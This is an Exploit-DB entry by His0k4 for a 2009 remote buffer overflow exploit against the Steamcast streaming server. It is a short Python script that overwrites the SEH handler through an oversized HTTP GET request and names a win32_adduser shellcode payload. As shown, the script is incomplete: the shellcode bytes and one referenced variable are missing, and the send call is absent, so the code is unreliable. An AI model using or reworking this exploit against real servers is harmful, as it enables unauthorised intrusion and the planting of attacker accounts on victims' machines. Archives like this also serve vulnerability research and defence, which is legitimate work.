Steamcast - HTTP Request Remote Buffer Overflow Exploit SEH 2

ID EDB-ID:8422
Type exploitdb
Reporter His0k4
Modified 2009-04-13T00:00:00


Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]. Remote exploit for windows platform

#[*] Usage   : [victime_ip]
#[*] Bug     : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]
#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln.        
#[*] Tested on :    Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ),,
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p

#Short Description : The previous exploit runs  small shellcodes only, this one is the opposite :)
#Note : The problem is that we need to find a dll wich its not compiled with GS, in my case i founded idmmbc its a loaded dll of internet download manager so try to find an unsafe dll.
#Other note : The shellcode will be executed when the program will be closed.
#Another one : When you have problems with running the exploit msg me before you msg str0ke.

import sys, socket
import struct

host = sys.argv[1] 
port = 8000

# win32_adduser -  PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub


exploit = "\x90"*(1003-len(shellcode)) + shellcode + "\xEB\x06\x90\x90" + "\xDB\x27\x02\x10" + "\x90"*20 + shellunt

#It needs a loop to works
while 1:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host, port))
	head =  "GET / HTTP/1.1\r\n"
	head += "Host: "+host+"\r\n"
	head += exploit+"\r\n"
	head += "\r\n\r\n"


# [2009-04-13]